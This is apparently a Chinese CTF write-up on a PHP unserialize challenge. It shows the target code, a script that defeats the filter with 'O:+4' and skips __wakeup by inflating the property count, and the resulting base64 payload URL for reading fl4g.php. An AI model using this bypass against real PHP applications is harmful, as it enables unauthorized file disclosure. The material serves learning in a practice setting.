然后参考我之前做的那道题的方法:反序列化unserialize 及实例
观察到会将var的值先进行base64解码然后进行反序列化(在这个过程中,魔术方法 __wakeup() 会被调用)
于是我在vscode里写入以下代码
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
if (isset($_GET['var'])) {
$var = base64_decode($_GET['var']);
if (preg_match('/[oc]:\d+:/i', $var)) {
die('stop hacking!');
} else {
@unserialize($var);
}
} else {
highlight_file("index.php");
}
$demo = new Demo('fl4g.php');
$serialized = serialize($demo); // 序列化对象
$serialized1=str_replace('O:4','O:+4',$serialized);
$serialized2=str_replace('1:{','2:{',$serialized1);
$base64_encoded = base64_encode($serialized2); // Base64 编码
echo $base64_encoded;
?>把它移到phpstudy的WWW目录下打开
复制,返回题目,url输入
index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
okk
欢迎评论区斧正或补充